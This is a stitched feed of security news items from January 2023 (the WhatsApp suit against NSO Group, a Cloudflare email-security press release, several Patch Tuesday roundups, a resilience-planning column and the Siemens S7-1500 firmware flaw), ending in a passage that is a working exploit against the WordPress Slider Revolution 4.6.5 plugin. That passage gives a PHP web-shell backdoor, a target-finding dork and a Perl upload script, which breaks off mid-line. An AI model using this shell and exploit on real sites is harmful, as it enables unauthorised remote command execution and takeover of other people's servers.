Categories: News
Tags: Pegasus

Tags:  spyware

Tags:  Pegasus spyware

Tags:  NSO Group

Tags:  NSO

Tags:  Apple

Tags:  WhatsApp

Tags:  Meta

Tags:  Foreign Sovereign Immunity Act

The US Supreme Court essentially gave Meta’s WhatsApp the go ahead to pursue their case against Pegasus’s NSO Group.



(Read more...)




The post WhatsApp lawsuit against NSO Group greenlit by Supreme Court  appeared first on Malwarebytes Labs.

On Monday, the US Supreme Court denied the NSO Group's petition for a _writ of certiorari_, a request to the high court to review its case, signaling that Meta's WhatsApp can go ahead with its case against the Israeli-based company behind the Pegasus spyware. The court didn't explain why it refused to hear the NSO's appeal.

If you recall, WhatsApp filed a lawsuit against NSO in 2019 under the Computer Fraud and Abuse Act for allegedly targeting and installing spyware on roughly 1,400 devices of its global users, including human rights activists, journalists, and government officials.

NSO group allegedly did this by exploiting a then zero-day vulnerability in WhatsAapp. Based on a detailed timeline of the case, NSO said it is protected by the Foreign Sovereign Immunity Act (FSIA), which shields foreign government officials from common law, making it immune to the lawsuit—an argument district court judges in California were unconvinced by.

The company then filed a motion to dismiss the case in the US Court of Appeals, insisting it should be granted immunity, much to the dismay of a number of organizations: Microsoft, Google, Cisco, GitHub, LinkedIn, VMWare, and Internet Association (IA). These companies then banded together to file an amicus brief supporting WhatsApp's case.

Microsoft said:

> “We believe the NSO Group's business model is dangerous and that such immunity would enable it and other PSOAs to continue their dangerous business without legal rules, responsibilities or repercussions. The expansion of sovereign immunity that NSO seeks would further encourage the burgeoning cyber-surveillance industry to develop, sell and use tools to exploit vulnerabilities in violation of US law. Private companies should remain subject to liability when they use their cyber-surveillance tools to break the law, or knowingly permit their use for such purposes, regardless of who their customers are or what they’re trying to achieve."

Eventually, the Appeals Court rejected NSO's appeal.

Appeals Court judge Danielle Forrest wrote in a unanimous opinion:

> "NSO does not contend that it meets the FSIA’s definition of 'foreign state,' and, of course, it cannot. It is not itself a sovereign. NSO is a private corporation that provides products and services to sovereigns — several of them," 
> 
> "Whatever NSO's government customers do with its technology and services does not render NSO an 'agency or instrumentality of a foreign state,' as Congress has defined that term. Thus, NSO is not entitled to the protection of foreign sovereign immunity."

The NSO Group's request for the Supreme Court to review its case was its last straw effort to be recognized as a foreign government agent and is, therefore, entitled to sovereign immunity.

In a statement to Reuters, WhatsApp spokesperson Carl Woog is quoted saying:

> "NSO's spyware has enabled cyberattacks targeting human rights activists, journalists and government officials. We firmly believe that their operations violate US law and they must be held to account for their unlawful operations."

Meta's WhatsApp is not the only tech giant suing the NSO Group. Apple also filed a lawsuit against the Israeli firm in November 2021 for violating terms of service by hacking into the devices of Apple users, calling the company "amoral 21st-century mercenaries."

**We don't just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

WhatsApp lawsuit against NSO Group greenlit by Supreme Court 

**San Francisco, CA, January 11, 2023** **–** Cloudflare, Inc. (NYSE: NET), the security, performance, and reliability company helping to build a better Internet, today announced several new Zero Trust email security solutions, compatible with any email provider, to protect employees from multichannel phishing attacks, prevent sensitive data being exfiltrated via email, and help businesses speed up and simplify deployments. Now, Cloudflare is providing organizations with its simple and robust phishing and malware protection that is deeply integrated with its Zero Trust platform, helping to secure all of an organization’s applications and data.

“You can’t have a complete Zero Trust solution without securing email, given that a huge proportion of all cyber attacks begin with phishing,” said Matthew Prince, co-founder and CEO of Cloudflare. “In 2022, Cloudflare Area 1 identified and kept almost 2.3 billion unwanted messages out of customer inboxes. Today we’re filling a void in the marketplace that has been underinvested in for the last ten years, with the first set of deeply integrated solutions that bring together Cloudflare Area 1 email security and our Zero Trust platform.”

Email is one of the most ubiquitous and also most exploited tools that businesses use every single day. The FBI’s latest Internet Crime Report shows that business email compromise and email account compromise, a subset of malicious phishing campaigns, are the most costly—with U.S. businesses losing nearly $2.4 billion. On top of that, email is also one of the hardest tools for businesses to secure, often resulting in multiple vendors, complex deployments, and a huge drain of resources for IT teams. Now, with Cloudflare’s Zero Trust SASE platform, customers can quickly and easily deploy comprehensive email security and data protection tools that are deeply integrated with their existing security stack and work with any email provider.

Cloudflare One provides a comprehensive Zero Trust SASE platform that is built natively into Cloudflare’s global network, spanning more than 275 cities in over 100 countries. This deeply integrated approach ensures a simple deployment in just a few clicks, without the need to change email providers, and lightning fast performance wherever users are. With Cloudflare Area 1’s new solutions, business will be able to:

*   **Automatically isolate suspicious links or attachments in emails:** With Link Isolation, If an employee clicks a link in an email it will automatically be opened using Cloudflare’s industry leading Remote Browser Isolation technology. Isolating any potentially risky links, downloads, or other zero day attacks from impacting that user’s computer and the wider corporate network.
*   **Identify and stop exfiltration of data:** With the rapid use of cloud-based email services within organizations, the amount of sensitive data that now resides outside a customer's premises has increased dramatically. By combining Cloudflare’s Data Loss Prevention and Area 1, businesses can create specific policies to scan for and block sensitive or protected content before it gets attached and sent.
*   **Onboard new Microsoft 365 domains in minutes:** Now it is as simple as possible to deploy Cloudflare Area 1 for Microsoft 365 domains via the Microsoft API. This means a single IT administrator can have the entire solution fully deployed, and running in minutes not days like legacy providers.

For more information on how to get started with Cloudflare Area 1 Security or Cloudflare One check out the information below:

*   Blog: Email Link Isolation: your safety net for the latest phishing attacks
*   Blog: How Cloudflare Area 1 and DLP work together to protect data in email
*   Landing Page
*   CIO Week

**About Cloudflare** Cloudflare, Inc. (www.cloudflare.com / @cloudflare) is on a mission to help build a better Internet. Cloudflare’s suite of products protect and accelerate any Internet application online without adding hardware, installing software, or changing a line of code. Internet properties powered by Cloudflare have all web traffic routed through its intelligent global network, which gets smarter with every request. As a result, they see significant improvement in performance and a decrease in spam and other attacks. Cloudflare was named to Entrepreneur Magazine’s Top Company Cultures 2018 list, ranked among the World’s Most Innovative Companies by Fast Company in 2019, awarded by Reuters Events for Global Responsible Business in 2020, named to Fast Company's Most Innovative Companies in 2021, and ranked among Newsweek's Top 100 Most Loved Workplaces in 2022.

**Forward-Looking Statements** This press release contains forward-looking statements within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934, as amended, which statements involve substantial risks and uncertainties. In some cases, you can identify forward-looking statements because they contain words such as “may,” “will,” “should,” “expect,” “explore,” “plan,” “anticipate,” “could,” “intend,” “target,” “project,” “contemplate,” “believe,” “estimate,” “predict,” “potential,” or “continue,” or the negative of these words, or other similar terms or expressions that concern Cloudflare’s expectations, strategy, plans, or intentions. However, not all forward-looking statements contain these identifying words. Forward-looking statements expressed or implied in this press release include, but are not limited to, statements regarding the capabilities and effectiveness of the Cloudflare One suite of Zero Trust solutions (including Cloudflare Area 1, Remote Browser Isolation, and Data Loss Prevention), the benefits to Cloudflare’s customers from using the Cloudflare One suite of Zero Trust solutions (including Cloudflare Area 1, Remote Browser Isolation, and Data Loss Prevention) and Cloudflare’s other products and technology, the expected functionality and performance of the Cloudflare One suite of Zero Trust solutions (including Cloudflare Area 1, Remote Browser Isolation, and Data Loss Prevention) and Cloudflare’s other products and technology, the timing of when any new Cloudflare One features (including Cloudflare Area 1, Remote Browser Isolation, and Data Loss Prevention) will be generally available to all current and potential Cloudflare customers, Cloudflare’s technological development, future operations, growth, initiatives, or strategies, and comments made by Cloudflare’s CEO and others. Cloudflare’s actual results could differ materially from those stated or implied in forward-looking statements due to a number of factors, including but not limited to, risks detailed in its filings with the Securities and Exchange Commission (SEC), including Cloudflare’s Quarterly Report on Form 10-Q filed on November 3, 2022, as well as other filings that we may make from time to time with the SEC.

The forward-looking statements made in this press release relate to events as of the date on which the statements are made. Cloudflare undertakes no obligation to update any forward-looking statements made in this press release to reflect events or circumstances after the date of this press release or to reflect new information or the occurrence of unanticipated events, except as required by law. Cloudflare may not actually achieve the plans, intentions, or expectations disclosed in its forward-looking statements, and you should not place undue reliance on Cloudflare’s forward-looking statements.

Cloudflare Announces Email Security & Data Protection Tools

The first Patch Tuesday fixes shipped by Microsoft for 2023 have addressed a total of 98 security flaws, including one bug that the company said is being actively exploited in the wild.
11 of the 98 issues are rated Critical and 87 are rated Important in severity, with the vulnerabilities also listed as publicly known at the time of release. Separately, the Windows maker is expected to release

The first Patch Tuesday fixes shipped by Microsoft for 2023 have addressed a total of 98 security flaws, including one bug that the company said is being actively exploited in the wild.

11 of the 98 issues are rated Critical and 87 are rated Important in severity, with the vulnerabilities also listed as publicly known at the time of release. Separately, the Windows maker is expected to release updates for its Chromium-based Edge browser.

The vulnerability that's under attack relates to CVE-2023-21674 (CVSS score: 8.8), a privilege escalation flaw in Windows Advanced Local Procedure Call (ALPC) that could be exploited by an attacker to gain SYSTEM permissions.

"This vulnerability could lead to a browser sandbox escape," Microsoft noted in an advisory, crediting Avast researchers Jan Vojtěšek, Milánek, and Przemek Gmerek for reporting the bug.

While details of the vulnerability are still under wraps, a successful exploit requires an attacker to have already obtained an initial infection on the host. It is also likely that the flaw is combined with a bug present in the web browser to break out of the sandbox and gain elevated privileges.

"Once the initial foothold has been made, attackers will look to move across a network or gain additional higher levels of access and these types of privilege escalation vulnerabilities are a key part of that attacker playbook," Kev Breen, director of cyber threat research at Immersive Labs, said.

That having said, the chances that an exploit chain like this is employed in a widespread fashion is limited owing to the auto-update feature used to patch browsers, Satnam Narang, senior staff research engineer at Tenable, said.

It's also worth noting that the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply patches by January 31, 2023.

What's more, CVE-2023-21674 is the fourth such flaw identified in ALPC – an inter-process communication (IPC) facility provided by the Microsoft Windows kernel – after CVE-2022-41045, CVE-2022-41093, and CVE-2022-41100 (CVSS scores: 7.8), the latter three of which were plugged in November 2022.

Two other privilege escalation vulnerabilities identified as being of high priority affect Microsoft Exchange Server (CVE-2023-21763 and CVE-2023-21764, CVSS scores: 7.8), which stem from an incomplete patch for CVE-2022-41123, according to Qualys.

"An attacker could execute code with SYSTEM-level privileges by exploiting a hard-coded file path," Saeed Abbasi, manager of vulnerability and threat research at Qualys, said in a statement.

Also resolved by Microsoft is a security feature bypass in SharePoint Server (CVE-2023-21743, CVSS score: 5.3) that could permit an unauthenticated attacker to circumvent authentication and make an anonymous connection. The tech giant noted, "customers must also trigger a SharePoint upgrade action included in this update to protect their SharePoint farm."

The January update further remediates a number of privilege escalation flaws, including one in Windows Credential Manager (CVE-2023-21726, CVSS score: 7.8) and three affecting the Print Spooler component (CVE-2023-21678, CVE-2023-21760, and CVE-2023-21765).

The U.S. National Security Agency (NSA) has been credited with reporting CVE-2023-21678. In all, 39 of the vulnerabilities that Microsoft closed out in its latest update enable the elevation of privileges.

Rounding up the list is CVE-2023-21549 (CVSS score: 8.8), a publicly known elevation of privilege vulnerability in the Windows SMB Witness Service, and another instance of security feature bypass impacting BitLocker (CVE-2023-21563, CVSS score: 6.8).

"A successful attacker could bypass the BitLocker Device Encryption feature on the system storage device," Microsoft said. "An attacker with physical access to the target could exploit this vulnerability to gain access to encrypted data."

Furthermore, Redmond has updated its guidance regarding the malicious use of signed drivers (called Bring Your Own Vulnerable Driver) to include an updated block list released as part of Windows security updates on January 10, 2023.

CISA on Tuesday also added CVE-2022-41080, an Exchange Server privilege escalation flaw, to the KEV catalog following reports that the vulnerability is being chained alongside CVE-2022-41082 to achieve remote code execution on vulnerable systems.

The exploit, codenamed OWASSRF by CrowdStrike, has been leveraged by the Play ransomware actors to breach target environments. The defects were fixed by Microsoft in November 2022.

The Patch Tuesday updates also arrive as Windows 7, Windows 8.1, and Windows RT reached end of support on January 10, 2023. Microsoft said it won't be offering an Extended Security Update (ESU) program for Windows 8.1, instead urging users to upgrade to Windows 11.

"Continuing to use Windows 8.1 after January 10, 2023 may increase an organization's exposure to security risks or impact its ability to meet compliance obligations," the company cautions.

**Software Patches from Other Vendors**

In addition to Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including —

*   Adobe
*   AMD
*   Android
*   Cisco
*   Citrix
*   Dell
*   F5
*   Fortinet
*   GitLab
*   Google Chrome
*   HP
*   IBM
*   Intel
*   Juniper Networks
*   Lenovo
*   Linux distributions Debian, Oracle Linux, Red Hat, SUSE, and Ubuntu
*   MediaTek
*   Qualcomm
*   SAP
*   Schneider Electric
*   Siemens
*   Synology
*   Zoom, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Issues January 2023 Patch Tuesday Updates, Warns of Zero-Day Exploit

Are you asking the right questions about potential scenarios when thinking about disaster recovery and business continuity?

I wish I had a dollar for every time we have collectively had a conversation about a zero day — each and every time we've discussed the dangerous nature of the latest vulnerability. I would have a nice tidy sum squirreled away by this point.

As security practitioners, we have developed a finely honed ability to run around in circles with our hair on fire. This may cause some of us to chuckle when we think back to incidents that we’ve had to manage or help bring to a conclusion, but it still stings a little to recall how things were managed in the past.

Far too often we learn our security lessons the hard way. Reactive security was, quite literally, the default setting for the industry for many years. Even now, I have conversations with CISOs who share tales of incident response activities gone horribly awry. We listen in rapt attention, and yet we never seem to learn the lessons that are in plain view.

Rather than approach security from a reactive perspective, we should always be planning for the future by asking the question, _what could go wrong_?

**What's in Your Disaster Recovery Plan?**

For years, companies and countries — governments, rather — have been working hard to move operations to the cloud. This makes perfect sense ... until it doesn't. When I read the disaster recovery and business continuity documents for these organizations over the past couple years, I noticed some pervasive themes.

For example, in the event of network failure, everyone would go to the local electronics shop and purchase replacement laptops.

I'm sure that would scale without issue. _Oops, sarcasm dial set to 11._

Another scenario frequently listed in these documents was that of a meteor hitting the building. At no point did any of the planners take into account the fact that if said disaster had taken place, the local landscape would be desolation as far as the eye could see in any direction.

**When Planning, Ask: What If?**

But what if a country invaded yours? What if there was a completely unprovoked attack? How would you operate if your cloud instance were hosted in the aggressor's country? How would you be sure that your system would have the security resilience to survive such a scenario? Are these questions included in your disaster recovery and business continuity plans?

The war in Ukraine has really served as an exemplar of worst-case scenarios for any country in the world today. There was a great deal of "what if" planning for various wartime situations long before the Russians ever crossed the border into Ukraine. The world needs to take note and start answering these questions.

Perhaps it is time to entertain a retreat from how we have approached globalization. We should look at how we can run our systems reliably if we had to sever connections with the rest of the world.

This line of thinking may seem extreme, but it's far more realistic than preparing for a meteor strike, let alone queuing up at the local electronics shop to buy laptops, along with hundreds of other companies.

If a cloud provider was cut off from the Internet for whatever reason, what would be your contingency plan to weather the storm? We have to be vigilant in the face of threats ranging from pickup trucks hitting power lines to chip fabrication plants needing to move to other countries due to ever-shifting political issues.

Building out our strategies to reduce risk and increase our security resilience will go a long way to help address the clear and present dangers we face in this modern age.

Security Planning: Ask What Could Go Wrong

Microsoft's January 2023 Patch Tuesday security update contains fixes for bugs in multiple products. Here's what you need to patch now.

Microsoft's first security update for 2023 contained patches for a whopping 98 vulnerabilities, including one that attackers are actively exploiting and another that is publicly known but has not been exploited yet.

Microsoft identified 11 of the vulnerabilities it disclosed today as being of "critical" severity, meaning organizations using affected products need to prioritize these flaws before addressing the other ones. It rated the remaining 87 as "Important," which is a rating the company uses to describe vulnerabilities that, if exploited, could compromise the confidentiality, integrity, or availability of user data but are often not remotely executable or requires some level of user interaction.

**Bugs in Frequently Attacked Products**

Several of the vulnerabilities in the January 2023 security update affect products that are favorite attacker targets. Five of them, for instance, impact Microsoft Exchange Server and three — including one of the most severe flaws in this month's update — are in SharePoint.

"The volume is definitely concerning, especially given the Exchange patches and SharePoint updates," says Dustin Childs, communication manager for Trend Micro's Zero Day Initiative (ZDI) which reported 25 of the bugs that Microsoft closed today. "These are common targets — and targets that often don’t get patched," he notes. "There are also updates submitted by the National Security Agency and Canada’s Communications Security Establishment. That may raise an eyebrow or two."

Multiple security researchers identified a Microsoft SharePoint Server security feature bypass vulnerability CVE-2023-21743 as one that organizations need to jump on right away because of the risk it presents. The bug allows an unauthenticated attacker to bypass authentication and make an anonymous connection to an affected SharePoint server. One complicating factor with the vulnerability for enterprise security teams is that patching alone is not sufficient to mitigate the threat it presents. In addition, they also need to trigger a SharePoint upgrade, which Microsoft has included in this month's security update to protect against exploit activity, Microsoft said.

"This is not a 'patch it and move on' sort of bug," Childs says. "To fully address this vulnerability, admins need to take additional steps as outlined in the update documentation."

**Zero-Day Bug in Windows ALPC**

Another high-priority vulnerability in the January 2023 update is CVE-2023-21674, an actively exploited bug in Windows Advanced Local Procedure Call (ALPC) that allows an attacker to elevate privileges on a compromised system. The zero-day vulnerability impacts all Windows OS versions and could allow an attacker to escape a browser sandbox and gain system level privileges, Microsoft said.

Satnam Narang, senior staff research engineer at Tenable, says that while full details of the bug are not available, it's possible that attackers likely chained the vulnerability with a flaw in a Chromium-based browser or Microsoft Edge to break out of a browser sandbox and gain full system access. 

"Because of the improvements made in browser security, traditional browser exploits by themselves are limited by sandbox technology, restricting an attacker's ability to access the underlying operating system," Narang tells Dark Reading. He says it is likely that an advanced persistent threat group discovered and exploited the vulnerability as part of a targeted attack.

Microsoft described one of the bugs it addressed this month as publicly known but not exploited. The vulnerability, tracked as CVE-2023-21549, exists on the Windows SMB Witness Service and allows an attacker to execute remote procedure call functions normally restricted to privileged accounts only. Microsoft has assigned a score of 8.8 to the vulnerability even though it has assessed the bug as less likely to be exploited.

**A Flood of Privilege-Escalation Flaws**

Two of the 25 bugs that ZDI reported — and which Microsoft patched this month — were Exchange Server elevation-of-privilege vulnerabilities (CVE-2023-21763 and CVE-2023-21764) that resulted from a failed patch for a previous elevation of privilege flaw in Exchange tracked as CVE-2022-41123. "Thanks to the use of a hard-coded path, a local attacker could load their own DLL and execute code at the level of SYSTEM," Childs says.

In total, 39 of the bugs that Microsoft addressed in its latest update enable elevation of privileges, a category of flaw that the company often has rated as being less severe than RCE bugs. This, however, does not mean that organizations can put off addressing them. "Despite their lower score, these vulnerabilities are typically seen in the early stages of an attack and blocking attackers from gaining SYSTEM or domain-level access early in the kill chain can slow down attackers," said Kev Breen, director of cyber-threat research at Immersive Labs in a statement.

Several of the elevation of privilege bugs in the January update affect the Windows Kernel. Among them are CVE-2023-21772, CVE-2023-21750, CVE-2023-21675 and CVE-2023-21773. "The potential risk from these vulnerabilities is high since they affect all devices that run any Windows OS, starting from Windows 7," security vendor Action1 said. Seven of the privilege escalation bugs have low complexity and require low privileges and no user interaction, meaning they are easy to attack, Action1 said.

Other bugs that security researchers identified as being of high priority in Microsoft's January 2023 security update include CVE-2023-21762 and CVE-2023-21745, both of which are spoofing vulnerabilities in Microsoft Exchange Server. "Email servers like Exchange are high-value targets for attackers, as they can allow an attacker to gain sensitive information through reading emails, or to facilitate Business Email Compromise style attacks," Breen said. Organizations need to be aware of the risks that such bugs preset and mitigate them, he added.

Microsoft also updated its previous guidance around the recent use of Microsoft-signed drivers in malicious campaigns by cybercriminals. The guidance now includes a block list that blocks attackers from using the compromised certificate in their environment. For their recommended actions, the company said, "Microsoft recommends that all customers install the latest Windows updates and ensure their anti-virus and endpoint detection products are up to date with the latest signatures and are enabled to prevent these attacks."

98 Patches: Microsoft Greets New Year With Zero-Day Security Fixes

Microsoft today released updates to fix nearly 100 security flaws in its Windows operating systems and other software. Highlights from the first Patch Tuesday of 2023 include a zero-day vulnerability in Windows, printer software flaws reported by the U.S. National Security Agency, and a critical Microsoft SharePoint Server bug that allows a remote, unauthenticated attacker to make an anonymous connection.

**Microsoft** today released updates to fix nearly 100 security flaws in its **Windows** operating systems and other software. Highlights from the first **Patch Tuesday** of 2023 include a zero-day vulnerability in Windows, printer software flaws reported by the **U.S. National Security Agency**, and a critical **Microsoft SharePoint Server** bug that allows a remote, unauthenticated attacker to make an anonymous connection.

At least 11 of the patches released today are rated “Critical” by Microsoft, meaning they could be exploited by malware or malcontents to seize remote control over vulnerable Windows systems with little or no help from users.

Of particular concern for organizations running **Microsoft SharePoint Server** is CVE-2023-21743. This is a Critical security bypass flaw that could allow a remote, unauthenticated attacker to make an anonymous connection to a vulnerable SharePoint server. Microsoft says this flaw is “more likely to be exploited” at some point.

But patching this bug may not be as simple as deploying Microsoft updates. **Dustin Childs**, head of threat awareness at **Trend Micro’s Zero Day Initiative**, said sysadmins need to take additional measures to be fully protected from this vulnerability.

“To fully resolve this bug, you must also trigger a SharePoint upgrade action that’s also included in this update,” Childs said. “Full details on how to do this are in the bulletin. Situations like this are why people who scream ‘Just patch it!’ show they have never actually had to patch an enterprise in the real world.”

Eighty-seven of the vulnerabilities earned Redmond’s slightly less dire “Important” severity rating. That designation describes vulnerabilities “whose exploitation could result in compromise of the confidentiality, integrity, or availability of user data, or of the integrity or availability of processing resources.”

Among the more Important bugs this month is CVE-2023-21674, which is an “elevation of privilege” weakness in most supported versions of Windows that has already been abused in active attacks.

**Satnam Narang**, senior staff research engineer at **Tenable**, said although details about the flaw were not available at the time Microsoft published its advisory on Patch Tuesday, it appears this was likely chained together with a vulnerability in a Chromium-based browser such as Google Chrome or Microsoft Edge in order to break out of a browser’s sandbox and gain full system access.

“Vulnerabilities like CVE-2023-21674 are typically the work of advanced persistent threat (APT) groups as part of targeted attacks,” Narang said. “The likelihood of future widespread exploitation of an exploit chain like this is limited due to auto-update functionality used to patch browsers.”

By the way, when was the last time you completely closed out your Web browser and restarted it? Some browsers will automatically download and install new security updates, but the protection from those updates usually only happens after you restart the browser.

Speaking of APT groups, the U.S. National Security Agency is credited with reporting CVE-2023-21678, which is another “important” vulnerability in the Windows Print Spooler software.

There have been so many vulnerabilities patched in Microsoft’s printing software over the past year (including the dastardly PrintNightmare attacks and borked patches) that KrebsOnSecurity has joked about Patch Tuesday reports being sponsored by Print Spooler. Tenable’s Narang points out that this is the third Print Spooler flaw the NSA has reported in the last year.

**Kevin Breen** at **Immersive Labs** called special attention to CVE-2023-21563, which is a security feature bypass in **BitLocker**, the data and disk encryption technology built into enterprise versions of Windows.

“For organizations that have remote users, or users that travel, this vulnerability may be of interest,” Breen said. “We rely on BitLocker and full-disk encryption tools to keep our files and data safe in the event a laptop or device is stolen. While information is light, this appears to suggest that it could be possible for an attacker to bypass this protection and gain access to the underlying operating system and its contents. If security teams are not able to apply this patch, one potential mitigation could be to ensure Remote Device Management is deployed with the ability to remotely disable and wipe assets.”

There are also two **Microsoft Exchange** vulnerabilities patched this month — CVE-2023-21762 and CVE-2023-21745. Given the rapidity with which threat actors exploit new Exchange bugs to steal corporate email and infiltrate vulnerable systems, organizations using Exchange should patch immediately. Microsoft’s advisory says these Exchange flaws are indeed “more likely to be exploited.”

**Adobe** released four patches addressing 29 flaws in **Adobe Acrobat** and **Reader**, **InDesign**, **InCopy**, and **Adobe Dimension**. The update for Reader fixes 15 bugs with eight of these being ranked Critical in severity (allowing arbitrary code execution if an affected system opened a specially crafted file).

For a more granular rundown on the updates released today, see the SANS Internet Storm Center roundup. Nearly 100 updates is a lot, and there are bound to be a few patches that cause problems for organizations and end users. When that happens, AskWoody.com usually has the lowdown.

Please consider backing up your data and/or imaging your system before applying any updates. And please sound off in the comments if you experience any problems as a result of these patches.

Microsoft Patch Tuesday, January 2023 Edition

More than 120 models of Siemens' S7-1500 PLCs contain a serious vulnerability—and no fix is on the way.

In 2009, the computer worm Stuxnet crippled hundreds of centrifuges inside Iran’s Natanz uranium enrichment plant by targeting the software running on the facility’s industrial computers, known as programmable logic controllers. The exploited PLCs were made by the automation giant Siemens and were all models from the company’s ubiquitous, long-running SIMATIC S7 product series. Now, more than a decade later, Siemens disclosed today that a vulnerability in its S7-1500 series could be exploited by an attacker to silently install malicious firmware on the devices and take full control of them.

The vulnerability was discovered by researchers at the embedded device security firm Red Balloon Security after they spent more than a year developing a methodology to evaluate the S7-1500’s firmware, which Siemens has encrypted for added protection since 2013. Firmware is the low-level code that coordinates hardware and software on a computer. The vulnerability stems from a basic error in how the cryptography is implemented, but Siemens can’t fix it through a software patch because the scheme is physically burned onto a dedicated ATECC CryptoAuthentication chip. As a result, Siemens says it has no fix planned for any of the 122 S7-1500 PLC models that the company lists as being vulnerable. 

Siemens says that because the vulnerability requires physical access to exploit on its own, customers should mitigate the threat by assessing “the risk of physical access to the device in the target deployment” and implementing “measures to make sure that only trusted personnel have access to the physical hardware.” The researchers point out, though, that the vulnerability could potentially be chained with other remote access vulnerabilities on the same network as the vulnerable S7-1500 PLCs to deliver the malicious firmware without in-person contact. The Stuxnet attackers famously used tainted USB thumb drives as a creative vector to introduce their malware into “air-gapped” networks and ultimately infect then-current S7-300 and 400 series PLCs.

“Seimans PLCs are used in very important industrial capacities around the world, many of which are potentially very attractive targets of attacks, as with Stuxnet and the nuclear centrifuges,” says Grant Skipper, a Red Balloon Security research scientist.

The ubiquity and criticality of S7-1500 PLCs are the two traits that motivated the researchers to do a deep dive into the security of the devices. To a motivated and well-resourced attacker, any flaws could be worth exploiting.

“The encrypted firmware means that without a lot of effort, you don’t have any insight inside a device, so we wanted to see what was hiding in the 1500 product line,” says Red Balloon Security research scientist Yuanzhe Wu. “The devices use a dedicated cryptography coprocessor to verify the encrypted firmware that’s loaded on the device, decrypt the firmware, and let the device boot. However, we found vulnerabilities that an attacker could abuse to make the crypto coprocessor act like an oracle to decrypt firmware and then help tamper with it to make malicious modifications.”

Since firmware underlies a device’s functions, the ability to silently modify the firmware would undermine all other security protections and give an attacker total control of the device without its owner realizing that anything has changed. 

“This separate crypto core is a very rudimentary chip. It’s not like a big processor, so it doesn’t really know who it’s talking to or what’s going on in the broader context,” Red Balloon’s Skipper says. “So if you can tell it the right things that you observed the processor telling it, it will talk to you as if you are the processor. So we can get in between the processor and the crypto core and then we basically tell it, ‘Hey, we are the processor and we are going to give you some data and we want you to encrypt it.’ And the little crypto core isn’t going to question that. It just does it.”

Siemens notes that the vulnerabilities are not related to the company’s own firmware update process and do not give attackers the ability to hijack that distribution channel. But the fact that any S7-1500 can become a firmware-blessing oracle is significant and bestows a power that individual devices should not have, undermining the whole purpose of encrypting the firmware in the first place.

“S7s should not be able to re-encrypt firmware for other S7s,” says Ang Cui, Red Balloon Security’s founder and CEO. “This is a fundamental design flaw and a significant implementation error.”

While Siemens isn’t directly releasing any fixes for the vulnerability, the company says it is in the process of releasing new-generation processor hardware that fixes the vulnerability for several S7-1500 models. And the company says it is “working on new hardware versions for remaining PLC types to address this vulnerability completely.” The Red Balloon researchers say they have not yet been able to independently validate that the vulnerability has been fixed in this latest S7-1500 hardware.

Still, the Red Balloon Security researchers say that it would be possible for Siemens to release a firmware audit tool for any PLC to check whether there has been tampering on the device. Since the vulnerability will persist on impacted devices, such a feature would give S7-1500 owners more insight into their PLCs and the ability to monitor them for suspicious activity.

“It’s the same movie, just a different day,” says Red Balloon’s Cui. “Does very complicated, exotic hardware security improve overall security? Well, if you do it right, it could help, but I haven’t seen any human do it right. When you do it wrong, it always becomes a double-edged sword—and the edge of that sword is very sharp.”

Though Siemens says it is addressing the S7-1500 vulnerability in new models, the population of vulnerable 1500s in industrial control and critical infrastructure systems around the world is extensive, and these units will remain in use for decades.

“Siemens is saying that this will not be fixed, so it’s not just a zero day—this will remain a forever day until all the vulnerable 1500s go out of service,” Cui says. “It could be dangerous to leave this unaddressed.”

A Siemens S7-1500 Logic Controller Flaw Raises the Specter of Stuxnet

WordPress Slider Revolution plugin version 4.6.5 suffers from a remote shell upload vulnerability.

====================================================================================================================================  
| # Title     : WordPress - Slider Revolution 4.6.5 WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit                 |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               |   
| # Vendor    : https://www.sliderrevolution.com/                                                                                  |    
| # Dork      : index off revslider\backup                                                                                         |  
====================================================================================================================================

[+] poc :

[+] Web shell upload :

    The following perl exploit will attempt to load the HTTP php shell through the update_plugin function  
    To use the exploit, be sure to compress the backdoor file  
    Because the exploit uploads a compressed file to the target

  [+] simple backdoor  :

     <?php  
     $cmd = $_GET['cmd'];  
     system($cmd);  
     ?> 

[+] Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension (indoushka.zip)

[+] The exploit and the backdoor must be in the same folder and path

[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine 

[+] Perl exploit :

 #!/usr/bin/perl  
#  
# Title     :WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit   
# Author    :indoushka  
# Vendor    :https://www.sliderrevolution.com/

use LWP::UserAgent;  
use MIME::Base64;  
use strict;

sub banner {  
system(($^O eq 'MSWin32') ? 'cls' : 'clear');  
print "   ============[+] Author : indoushka[+]===================\n";  
print "[+] Slider Revolution 4.6.5 shell upload 0-day exploit     [+]\n";  
print "   ========================================================   \n";  
print "[+] Uploading an web shell:                                [+]\n";  
print "[+] The following perl exploit will attempt to load the    [+]\n";   
print "[+] HTTP php backdoor through the update_plugin function   [+]\n";  
print "[+] To use the exploit, make sure you compress the backdoor[+]\n";   
print "============================================================== \n";  
system('color a');  
}

if (!defined ($ARGV[0] && $ARGV[1])) {  
banner();  
print "perl $0 <target> <plugin>\n";  
print "perl $0 http://localhost revslider\n";  
exit;  
}

my $zip1 = "indoushka.zip";

unless (-e ($zip1))  
{   
banner();  
print "[-] $zip1 not found! RTFM\n";  
exit;  
}

my $host = $ARGV[0];  
my $plugin = $ARGV[1];  
my $action;  
my $update_file;

if ($plugin eq "revslider") {  
$action = "revslider_ajax_action";  
$update_file = "$zip1";  
}  
elsif ($plugin eq "showbiz") {  
$action = "showbiz_ajax_action";

}  
else {  
banner();  
print "[-] Wrong plugin name\n";  
print "perl $0 <target> <plugin>\n";  
print "perl $0 http://localhost revslider\n";  
exit;  
}  
my $target = "wp-admin/admin-ajax.php";  
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php"; 

sub randomagent {  
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',  
